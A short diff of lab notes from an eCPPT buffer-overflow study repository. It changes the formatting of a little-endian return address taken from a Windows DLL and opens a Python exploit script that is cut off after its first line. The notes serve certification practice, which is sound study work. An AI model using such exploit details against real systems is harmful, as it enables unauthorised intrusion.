parrotassassin15/eCPPT/Buffer-Overflow-Prep/Lab-Machine/Lab-Notes.md

 You can also take a look at jmp.txt for the remainder of the vulnerable applications

-MSVRCT.ddl return address is: \x59\x54\xc3\x77 ( because of little indian we want to reverse it that is why it is reversed )
+MSVRCT.ddl return address is: "\x59\x54\xc3\x77" ( because of little indian we want to reverse it that is why it is reversed )

-so we updated our exploit to look like this:
+So we updated our exploit to look like this:

 ```python3
 #!/usr/bin/python3